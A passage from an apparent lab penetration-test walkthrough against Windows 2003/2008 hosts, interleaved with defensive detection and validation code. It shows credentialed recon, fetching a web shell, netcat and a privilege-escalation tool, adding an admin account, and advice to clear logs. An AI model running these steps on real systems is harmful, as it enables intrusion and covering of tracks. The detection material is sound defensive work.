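2011-09-16T12:02:17|XP-INTRANET|XP-INTRANET\Jack|C:\WINDOWS\PSEXESVC.exe|C:\WINDOWS\system32\sc.exe|sc config tlntsvr start= auto
2011-09-16T12:02:40|XP-INTRANET|XP-INTRANET\Jack|C:\WINDOWS\PSEXESVC.exe|C:\WINDOWS\system32\netsh.exe|netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174
2011-09-18T05:10:03|SERVER-2003|NT AUTHORITY\SYSTEM|C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe|C:\WINDOWS\system32\cmd.exe|cmd.exe /c net user IWAM_NETASPS $ecretP4$$ /add
2011-09-18T05:10:09|SERVER-2003|NT AUTHORITY\SYSTEM|C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe|C:\WINDOWS\system32\cmd.exe|cmd.exe /c net localgroup administrators IWAM_NETASPS /add
2011-09-18T05:20:44|SERVER-2003|SERVER-2003\IWAM_NETASPS|C:\WINDOWS\system32\cmd.exe|C:\WINDOWS\system32\reg.exe|reg save HKLM\SAM SAM
2011-09-18T05:21:00|SERVER-2003|SERVER-2003\IWAM_NETASPS|C:\WINDOWS\explorer.exe|C:\WINDOWS\system32\notepad.exe|notepad.exe
"""

# Parent-based rules: a shell spawned by SQL Server is xp_cmdshell in action, and a
# process whose parent is the PsExec service binary was started remotely via PsExec.
PARENT_RULES = [
    ("child of SQL Server (xp_cmdshell)", re.compile(r"\\sqlservr\.exe$", re.I)),
    ("child of PsExec service (PSEXESVC)", re.compile(r"\\psexesvc\.exe$", re.I)),
]

# Command-line rules, one per technique seen in the write-up.
COMMAND_RULES = [
    ("SAM/SYSTEM hive copy",
     re.compile(r"\\repair\\(sam|system)\b|reg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM)\b", re.I)),
    ("telnet service enabled",
     re.compile(r"\bsc(\.exe)?\s+(config|start)\s+tlntsvr\b", re.I)),
    ("firewall port opened via netsh",
     re.compile(r"\bnetsh(\.exe)?\s+firewall\s+add\s+portopening\b", re.I)),
    ("local account created",
     re.compile(r"\bnet(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("account added to Administrators",
     re.compile(r"\bnet(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
]


def parse_events(text):
    """Parse the records into dicts. The command line may itself contain '|',
    so split at most five times and keep the remainder intact."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|", 5)
        if len(parts) != 6:
            raise ValueError(f"malformed record: {line!r}")
        ts, host, user, parent, image, cmd = parts
        events.append({"ts": ts, "host": host, "user": user,
                       "parent": parent, "image": image, "cmd": cmd})
    return events


def detect(events):
    """Return one (timestamp, host, rule_name) tuple per rule each event trips."""
    alerts = []
    for e in events:
        for name, pat in PARENT_RULES:
            if pat.search(e["parent"]):
                alerts.append((e["ts"], e["host"], name))
        for name, pat in COMMAND_RULES:
            if pat.search(e["cmd"]):
                alerts.append((e["ts"], e["host"], name))
    return alerts


if __name__ == "__main__":
    for ts, host, rule in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{ts} {host}: {rule}")
```

The notepad.exe record is the control: it trips nothing, while each of the other six records trips at least one rule, and the PsExec and xp_cmdshell records trip two.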
New target, so let's go back to reconnaissance.
System Information Gathering
OS Information
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion
Name                                                                                    ServicePackMajorVersion
Microsoft Windows Server 2003 Standard Edition|C:\WINDOWS|\Device\Harddisk0\Partition1  2
Installed Software
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version
Name                                                    Version
Microsoft SQL Server VSS Writer                         9.00.1399.06
Microsoft SQL Server Management Studio Express          9.00.2047.00
Microsoft SQL Server 2005 Express Edition (SQLEXPRESS)  9.00.1399.06
MSXML 6.0 Parser                                        6.00.3883.8
Microsoft .NET Framework 2.0                            2.0.50727
Microsoft SQL Server Setup Support Files (English)      9.00.1399.06
Microsoft SQL Server Native Client                      9.00.1399.06
Running Processes
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief
HandleCount  Name                 Priority  ProcessId  ThreadCount  WorkingSetSize
0            System Idle Process  0         0          1            16384
1569         System               8         4          55           217088
31           smss.exe             11        240        2            458752
481          csrss.exe            13        300        10           3317760
526          winlogon.exe         13        332        24           10756096
329          services.exe         9         384        17           3985408
571          lsass.exe            9         396        30           9371648
161          svchost.exe          8         588        7            5005312
285          svchost.exe          8         660        10           3923968
137          svchost.exe          8         728        7            4132864
171          svchost.exe          8         780        13           5689344
1025         svchost.exe          8         796        45           17334272
131          spoolsv.exe          8         988        13           4653056
168          msdtc.exe            8         1040       14           4648960
391          cisvc.exe            8         1128       23           204800
162          dns.exe              8         1176       12           4661248
73           svchost.exe          8         1216       2            2547712
336          inetinfo.exe         8         1268       16           10919936
370          sqlservr.exe         8         1316       29           20021248
57           svchost.exe          8         1416       2            2183168
158          snmp.exe             8         1560       6            5033984
87           sqlbrowser.exe       8         1624       9            3080192
86           winvnc4.exe          8         1760       4            3997696
158          svchost.exe          8         1892       15           5857280
236          svchost.exe          8         2096       25           4702208
97           alg.exe              8         2248       5            3239936
353          wmiprvse.exe         8         2308       7            11517952
121          csrss.exe            13        2596       10           3239936
232          winlogon.exe         13        2624       14           3043328
83           rdpclip.exe          8         2780       4            1298432
366          explorer.exe         8         2880       10           5459968
275          mmc.exe              8         3148       8            3489792
96           cidaemon.exe         4         3232       3            249856
153          cidaemon.exe         4         3304       5            487424
115          cidaemon.exe         4         3340       4            262144
47           notepad.exe          8         2448       2            614400
40           logon.scr            4         276        2            2248704
124          csrss.exe            13        3592       10           19582976
228          winlogon.exe         13        3816       15           3239936
86           rdpclip.exe          8         3964       5            1282048
260          explorer.exe         8         1188       8            3506176
71           cmd.exe              8         3636       2            942080
39           scrnsave.scr         4         3352       2            1798144
136          wmiprvse.exe         8         3712       9            5275648
Local Drives Info
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get description,name,freespace,size
Description              FreeSpace   Name  Size
3 1/2 Inch Floppy Drive              A:
Local Fixed Disk         5958295552  C:    8578932736
CD-ROM Disc              0           D:    623075328
Shares Info
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table
AccessMask  AllowMaximum  Description    InstallDate  MaximumAllowed  Name    Path        Status  Type
            TRUE                                                      FTP     C:\FTP      OK      0
            TRUE          Default share                               C$      C:\         OK      -2147483648
            TRUE          Remote IPC                                  IPC$                OK      -2147483645
            TRUE          Remote Admin                                ADMIN$  C:\WINDOWS  OK      -2147483648
Network Info
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get DefaultIPGateway,DHCPServer,DNSDomain,DNSServerSearchOrder,IPAddress,IPSubnet
DefaultIPGateway  DHCPServer  DNSDomain      DNSServerSearchOrder  IPAddress       IPSubnet
{"10.0.1.65"}     10.0.1.65   lab2           {"10.0.1.68"}         {"10.0.1.75"}   {"255.255.255.192"}
{"10.0.1.137"}    10.0.1.137  lab2-intranet  {"10.0.1.137"}        {"10.0.1.140"}  {"255.255.255.248"}

Second interface: 10.0.1.75 / 255.255.255.192. Multihomed machine, that's a good sign.
Persistence
Let's try to get a telnet connection.
List service information
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

AcceptPause=FALSE
AcceptStop=FALSE
Caption=Application Experience Lookup Service
CheckPoint=0
CreationClassName=Win32_Service
Description=Processes application compatibility lookup requests for applications as they are launched.
DesktopInteract=FALSE
DisplayName=Application Experience Lookup Service
ErrorControl=Normal
ExitCode=0
InstallDate=
Name=AeLookupSvc
PathName=C:\WINDOWS\system32\svchost.exe -k netsvcs
ProcessId=796
ServiceSpecificExitCode=0
ServiceType=Share Process
Started=TRUE
StartMode=Auto
StartName=LocalSystem
State=Running
Status=OK
SystemCreationClassName=Win32_ComputerSystem
SystemName=SERVER-2003
TagId=0
WaitHint=0

AcceptPause=FALSE
AcceptStop=FALSE
Caption=Alerter
CheckPoint=0
CreationClassName=Win32_Service
Description=Notifies selected users and computers of administrative alerts. If the service is stopped, programs that use administrative alerts will not receive them. If this service is disabled, any services that explicitly depend on it will fail to start.
DesktopInteract=FALSE
DisplayName=Alerter
ErrorControl=Normal
ExitCode=1077
InstallDate=
Name=Alerter
PathName=C:\WINDOWS\system32\svchost.exe -k LocalService
ProcessId=0
ServiceSpecificExitCode=0
ServiceType=Share Process
Started=FALSE
StartMode=Disabled
StartName=NT AUTHORITY\LocalService
State=Stopped
Status=OK
SystemCreationClassName=Win32_ComputerSystem
SystemName=SERVER-2003
TagId=0
WaitHint=0
Find a specific service's state
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET State,StartMode
StartMode  State
Disabled   Stopped
Change the service's start mode so it starts automatically at boot
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL ChangeStartMode Automatic
Executing (\\SERVER-2003\ROOT\CIMV2:Win32_Service.Name="TlntSvr")->ChangeStartMode()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
};
Starting the service
C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL StartService
Executing (\\SERVER-2003\ROOT\CIMV2:Win32_Service.Name="TlntSvr")->StartService()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
};
Test the connection
*=====================================
Welcome to Microsoft Telnet Server.
*=====================================
C:\Documents and Settings\IWAM_NETASPS>
More Recon & Mapping
Finding new friends to play with
Ping Sweep
C:\>FOR /L %i in (1,1,255) do @ping -n 1 10.0.1.%i | find "Reply"
Reply from 10.0.1.65: bytes=32 time=2ms TTL=64
Reply from 10.0.1.66: bytes=32 time=4ms TTL=128
Reply from 10.0.1.68: bytes=32 time=6ms TTL=128
Reply from 10.0.1.75: bytes=32 time<1ms TTL=128
Reply from 10.0.1.137: bytes=32 time=31ms TTL=64
Reply from 10.0.1.138: bytes=32 time<1ms TTL=128
Reply from 10.0.1.140: bytes=32 time<1ms TTL=128
New Hosts Found
10.0.1.66 and 10.0.1.68
Let's use Nbtstat to gather NetBIOS information
10.0.1.66
C:\>nbtstat -a 10.0.1.66

Local Area Connection:
Node IpAddress: [10.0.1.75] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WINDOWS-7      <00>  UNIQUE      Registered
    LAB2           <00>  GROUP       Registered
    WINDOWS-7      <20>  UNIQUE      Registered
    LAB2           <1E>  GROUP       Registered
    LAB2           <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-0C-29-03-FA-DF

Local Area Connection 2:
Node IpAddress: [10.0.1.140] Scope Id: []

    Host not found.
10.0.1.68
C:\>nbtstat -a 10.0.1.68

Local Area Connection:
Node IpAddress: [10.0.1.75] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SERVER-2008    <00>  UNIQUE      Registered
    LAB2           <00>  GROUP       Registered
    LAB2           <1C>  GROUP       Registered
    SERVER-2008    <20>  UNIQUE      Registered
    LAB2           <1B>  UNIQUE      Registered

    MAC Address = 00-0C-29-5D-09-FD

Local Area Connection 2:
Node IpAddress: [10.0.1.140] Scope Id: []

    Host not found.
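The suffixes in those tables are what give the domain controller away: <1C> GROUP and <1B> UNIQUE are only registered by DCs, which is worth knowing when you decide whether NetBIOS over TCP/IP needs to be on at all. The parser below is an added example, not code from the original post; the two tables are copies of the post's nbtstat output and the suffix meanings are the standard NetBIOS name suffixes.

```python
"""Classify a host from its `nbtstat -a` name table.

Added example, not from the original post. The sample tables are copies of the
post's output for 10.0.1.66 and 10.0.1.68.
"""
import re

# (suffix, type) -> role. <1C>/<1B> mark domain controllers, which is exactly
# what an unauthenticated LAN user learns from a single nbtstat query.
SUFFIX_ROLES = {
    ("03", "UNIQUE"): "messenger service",
    ("20", "UNIQUE"): "file server service",
    ("1B", "UNIQUE"): "domain master browser (PDC emulator)",
    ("1C", "GROUP"): "domain controller",
    ("1D", "UNIQUE"): "master browser",
    ("1E", "GROUP"): "browser service elections",
    ("01", "GROUP"): "master browser (__MSBROWSE__)",
}

ENTRY = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)")
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f-]{17})")

NBTSTAT_66 = """\
Local Area Connection:
Node IpAddress: [10.0.1.75] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WINDOWS-7      <00>  UNIQUE      Registered
    LAB2           <00>  GROUP       Registered
    WINDOWS-7      <20>  UNIQUE      Registered
    LAB2           <1E>  GROUP       Registered
    LAB2           <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-0C-29-03-FA-DF
"""

NBTSTAT_68 = """\
Local Area Connection:
Node IpAddress: [10.0.1.75] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SERVER-2008    <00>  UNIQUE      Registered
    LAB2           <00>  GROUP       Registered
    LAB2           <1C>  GROUP       Registered
    SERVER-2008    <20>  UNIQUE      Registered
    LAB2           <1B>  UNIQUE      Registered

    MAC Address = 00-0C-29-5D-09-FD
"""


def parse_nbtstat(text):
    """Return (entries, mac); entries are (name, suffix, type, status) tuples."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            entries.append((name, suffix.upper(), ntype, status))
    mac = MAC.search(text)
    return entries, (mac.group(1) if mac else None)


def classify_host(entries):
    """Derive host name, domain/workgroup and roles from the registered names."""
    info = {"host": None, "domain": None, "roles": set()}
    for name, suffix, ntype, status in entries:
        if status != "Registered":
            continue
        if (suffix, ntype) == ("00", "UNIQUE"):
            info["host"] = name
        elif (suffix, ntype) == ("00", "GROUP"):
            info["domain"] = name
        role = SUFFIX_ROLES.get((suffix, ntype))
        if role:
            info["roles"].add(role)
    return info


if __name__ == "__main__":
    for text in (NBTSTAT_66, NBTSTAT_68):
        entries, mac = parse_nbtstat(text)
        print(mac, classify_host(entries))
```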
Let's find out more about IP 10.0.1.68 - SERVER-2008
Port Scan
C:\>FOR /L %i in (1,1,6000) do @netsh.exe diag connect iphost 10.0.1.68 %i | find "[%i]"
Server appears to be running on port(s) [53]
Server appears to be running on port(s) [80]
Server appears to be running on port(s) [88]
Server appears to be running on port(s) [135]
Server appears to be running on port(s) [139]
Server appears to be running on port(s) [389]
Server appears to be running on port(s) [445]
Server appears to be running on port(s) [593]
Server appears to be running on port(s) [636]
Server appears to be running on port(s) [3268]
Server appears to be running on port(s) [3389]
Server appears to be running on port(s) [5357]
Banner Grabbing port 80 with Telnet
C:\>telnet 10.0.1.68 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 2221
Content-Type: text/html
Last-Modified: Wed, 01 Jun 2011 07:31:37 GMT
Accept-Ranges: bytes
ETag: "2e5fd4f02d20cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 01 Jun 2011 08:44:41 GMT
Connection: close

Connection to host lost.
Check the allowed Options
C:\>telnet 10.0.1.68 80
OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Wed, 01 Jun 2011 08:45:35 GMT
Connection: close
Content-Length: 0

Connection to host lost.
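Two banner grabs are enough to list what a hardening pass on this IIS box should remove: the Server and X-Powered-By headers that name the exact stack, and TRACE in the allowed methods. The reviewer below is an added example, not code from the original post; the sample response is a copy of the OPTIONS reply above, and the list of headers and methods it looks for is my own choice.

```python
"""Review an HTTP response for what a banner grab reveals.

Added example, not from the original post; SAMPLE_OPTIONS_RESPONSE is a copy of
the post's OPTIONS reply from 10.0.1.68.
"""

SAMPLE_OPTIONS_RESPONSE = """HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Wed, 01 Jun 2011 08:45:35 GMT
Connection: close
Content-Length: 0

"""

# Headers that identify the server stack version to anyone who asks.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
# Methods that rarely belong on a production site; TRACE enables cross-site tracing.
RISKY_METHODS = {"TRACE", "TRACK", "PUT", "DELETE"}


def parse_http_response(raw):
    """Split a raw response into (status_line, {lower-case header: value})."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def allowed_methods(headers):
    """Union of the methods advertised in Allow and Public (IIS sends both)."""
    methods = set()
    for h in ("allow", "public"):
        if h in headers:
            methods.update(m.strip().upper() for m in headers[h].split(","))
    return methods


def review_response(raw):
    """Return the findings a hardening review would raise, in a stable order."""
    _status, headers = parse_http_response(raw)
    findings = []
    for h in DISCLOSURE_HEADERS:
        if h in headers:
            findings.append(f"{h} header discloses {headers[h]}")
    for m in sorted(allowed_methods(headers) & RISKY_METHODS):
        findings.append(f"{m} method is enabled")
    return findings


if __name__ == "__main__":
    for finding in review_response(SAMPLE_OPTIONS_RESPONSE):
        print(finding)
```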
Connecting to the Server-2003 machine through Remote Desktop and using the browser to get more information
Let's take a look at the web page source
...
<form onSubmit="javascript: return CheckTypes(this, new Array('.jpg', '.jpeg', '.gif', '.bmp'), 'include');" name="myform" id="myform" method="post" action="Multiplefilesupload.aspx" encType="multipart/form-data">
Select only *.jpg, *.jpeg, *.gif, or *.bmp file:
<input id="brr" type="file" name="file1">
<input type="submit" name="SubmitButton" value="Upload">
</form>
...
Now there's a good idea: using JavaScript for file upload validation.
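The fix for that form is not better JavaScript but a check on the server that does not trust the name or the browser at all: allow-list the final extension, confirm the bytes match the claimed type, and store the file under a server-chosen name outside the web root. The validator below is an added example, not code from the original post or from the application it tests; its allow-list mirrors the form's (.jpg, .jpeg, .gif, .bmp), and every filename and byte string in the test is constructed.

```python
"""Server-side upload validation to pair with (never replace) a client-side check.

Added example, not from the original post. The allow-list mirrors the post's
form; the magic-byte signatures are the standard JPEG/GIF/BMP file headers.
"""
import os
import secrets

# extension -> acceptable leading bytes for that type
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".bmp": (b"BM",),
}
MAX_BYTES = 2 * 1024 * 1024


def _basename(filename):
    """Strip any directory part, whether the client used / or \\ separators."""
    return os.path.basename(filename.replace("\\", "/"))


def validate_upload(filename, content):
    """Return (ok, reason). The name is trusted only for its final extension,
    and the extension must agree with the file's own header bytes."""
    if not content or len(content) > MAX_BYTES:
        return False, "empty or oversized"
    ext = os.path.splitext(_basename(filename))[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed"
    if not any(content.startswith(sig) for sig in ALLOWED[ext]):
        return False, f"content does not look like {ext}"
    return True, "ok"


def storage_name(filename):
    """Server-chosen name: random token plus the validated extension, so the
    client's name (and anything like cmdasp.aspx) never reaches the file system."""
    ext = os.path.splitext(_basename(filename))[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, data in [("photo.gif", b"GIF89a" + b"\x00" * 16),
                       ("cmdasp.aspx", b"<%@ Page Language=\"C#\" %>"),
                       ("cmd.aspx.gif", b"<%@ Page %>")]:
        print(name, validate_upload(name, data))
```

The upload directory itself should also be outside any path IIS will execute from (the post later uses C:\inetpub\wwwroot\UploadedFiles, which is exactly where a web shell wants to land), so a validation miss still does not give the client code execution.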
Pivoting
Disable scripts in the browser
Download cmdasp.aspx from FTP
C:\Documents and Settings\IWAM_NETASPS\Desktop>ftp 172.16.0.3
Connected to 172.16.0.3.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 11:02. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (172.16.0.3:(none)): Bob
331 User Bob OK. Password required
Password:
230-User Bob has group access to:  1001
230 OK. Current directory is /
ftp> get cmdasp.aspx
200 PORT command successful
150 Connecting to port 5001
226-File successfully transferred
226 0.000 seconds (measured here), 10.03 Mbytes per second
ftp: 1442 bytes received in 0.02Seconds 90.13Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 2 kbytes.
221 Logout.
Upload the cmdasp.aspx shell
List Installed OS Hotfixes and Service Packs
wmic /output:C:\inetpub\wwwroot\UploadedFiles\hotfixes.htm qfe list
List files in C:\inetpub\wwwroot\UploadedFiles
View hot fixes
Download netcat and Chimichurri
C:\Documents and Settings\IWAM_NETASPS\Desktop>ftp 172.16.0.3
Connected to 172.16.0.3.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 11:02. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (172.16.0.3:(none)): Bob
331 User Bob OK. Password required
Password:
230-User Bob has group access to:  1001
230 OK. Current directory is /
ftp> bin
200 TYPE is now 8-bit binary
ftp> get nc.exe
200 PORT command successful
150-Connecting to port 5001
150 60.0 kbytes to download
226-File successfully transferred
226 0.094 seconds (measured here), 0.63 Mbytes per second
ftp: 61440 bytes received in 0.08Seconds 777.72Kbytes/sec.
ftp> get Chimichurri.exe
200 PORT command successful
150-Connecting to port 5002
150 392.5 kbytes to download
226-File successfully transferred
226 0.679 seconds (measured here), 0.56 Mbytes per second
ftp: 401920 bytes received in 0.70Seconds 571.72Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 453 kbytes.
221 Logout.
Upload Chimichurri.exe
Start a Netcat listener with nc.exe -L -p 5555 and Run Chimichurri
Add a new User and assign user to the Administrators group
Check our new User and Password
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\IWAM_NETASPS>systeminfo /S \\10.0.1.68 /U Lab2\iKuppu /P P4$$w0rd

Host Name:                 SERVER-2008
OS Name:                   Microsoft® Windows Server® 2008 Standard
OS Version:                6.0.6001 Service Pack 1 Build 6001
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                92573-029-0000095-76373
Original Install Date:     5/21/2011, 6:41:14 AM
System Up Time:            2 Days, 18 Hours, 17 Minutes, 17 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 15 Model 2 Stepping 8 GenuineIntel ~2805 Mhz
BIOS Version:              PTLTD - 6040000
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              pt;Portuguese (Portugal)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory:     511 MB
Available Physical Memory: 140 MB
Page File: Max Size:       1,513 MB
Page File: Available:      1,170 MB
Page File: In Use:         343 MB
Page File Location(s):     N/A
Domain:                    Lab2.lab
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB948609
                           [02]: KB948610
                           [03]: KB956250
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.1.65
                                 IP address(es)
                                 [01]: 10.0.1.68
                                 [02]: fe80::5963:ac2a:6f8b:53e7
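The one step in this chain that is loud in the Security log is the last one: a new account that lands in Administrators within seconds of being created, by a subject that is SYSTEM or a web service identity rather than an admin at a console. The correlation below is an added example, not code from the original post; the events are constructed (loosely modelled on the Lab2 domain and the iKuppu account above), and the event IDs are the Windows Vista/Server 2008 Security log IDs for "user account created" (4720) and "member added to a security-enabled local group" (4732). The severity heuristic is my own.

```python
"""Flag accounts that are created and then made local Administrators soon after.

Added example, not from the original post. SAMPLE_EVENTS is constructed; 4720
(user account created) and 4732 (member added to a security-enabled local
group) are the Security-log event IDs used since Windows Vista/Server 2008.
"""
from datetime import datetime, timedelta

USER_CREATED = 4720
LOCAL_GROUP_MEMBER_ADDED = 4732
PRIVILEGED_GROUPS = {"Administrators"}

# Constructed sample: one suspicious sequence, one normal onboarding, one
# group add for an account whose creation is outside the sample.
SAMPLE_EVENTS = [
    {"time": "2011-06-01 11:10:02", "id": 4720, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "iKuppu", "group": None},
    {"time": "2011-06-01 11:10:31", "id": 4732, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "iKuppu", "group": "Administrators"},
    {"time": "2011-06-01 09:00:00", "id": 4720, "subject": "LAB2\\helpdesk",
     "target": "newhire07", "group": None},
    {"time": "2011-06-01 09:00:40", "id": 4732, "subject": "LAB2\\helpdesk",
     "target": "newhire07", "group": "Remote Desktop Users"},
    {"time": "2011-05-30 14:12:05", "id": 4732, "subject": "LAB2\\admin",
     "target": "backupsvc", "group": "Administrators"},
]


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def _severity(subject):
    """Heuristic: creation by SYSTEM or an IIS service identity (IWAM_*/IUSR_*)
    means no human was logged on to do it."""
    s = subject.upper()
    return "high" if s.endswith("SYSTEM") or "IWAM_" in s or "IUSR_" in s else "medium"


def find_new_privileged_accounts(events, window=timedelta(hours=1)):
    """One alert per account that is created and added to a privileged group
    within `window`, regardless of the order events were collected in."""
    created, alerts = {}, []
    for ev in sorted(events, key=_ts):
        key = ev["target"].lower()
        if ev["id"] == USER_CREATED:
            created[key] = ev
        elif ev["id"] == LOCAL_GROUP_MEMBER_ADDED and ev["group"] in PRIVILEGED_GROUPS:
            birth = created.get(key)
            if birth and _ts(ev) - _ts(birth) <= window:
                alerts.append({
                    "account": ev["target"],
                    "group": ev["group"],
                    "created_by": birth["subject"],
                    "added_by": ev["subject"],
                    "seconds": int((_ts(ev) - _ts(birth)).total_seconds()),
                    "severity": _severity(ev["subject"]),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_new_privileged_accounts(SAMPLE_EVENTS):
        print(alert)
```

Feed it the Subject/Target fields from real 4720/4732 records (wevtutil or an export from your SIEM); the same logic applies to 4728 if the group is a domain global group such as Domain Admins.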
Game Over
Note
Remember to clean up. Clear the logs, remove all the usernames added, remove all the files and tools uploaded, and restore the systems to their initial state.
__________________________________________________________
Tools and exploits used in this scenario
Backtrack 5 R1 - http://www.backtrack-linux.org/
Chimichurri - http://www.argeniss.com/research/Chimichurri.zip
Fpipe v2.1 - http://www.mcafee.com/us/downloads/free-tools/fpipe.aspx
Hydra - http://thc.org/thc-hydra/
John the Ripper - http://www.openwall.com/john//
Web Shell cmdasp.aspx - http://code.google.com/p/fuzzdb/source/browse/trunk/web-backdoors/wbc-v1b/cmdasp.aspx?r=58
Netcat- http://joncraton.org/files/nc111nt.zip
PsExec v1.98 - http://technet.microsoft.com/en-us/sysinternals/bb897553
Samdump2 - http://sourceforge.net/projects/ophcrack/files/samdump2/2.0.1/
Tsql - http://www.freetds.org/
__________________________________________________________
http://blog.commandlinekungfu.com/
http://isc.sans.edu/diary.html?storyid=1229
http://isc.sans.edu/diary.html?storyid=2376
http://www.skullsecurity.org/wiki/index.php/Passwords
http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf
http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html
http://www.pentester.es/2011/05/unprivileged-network-post-exploitacion.html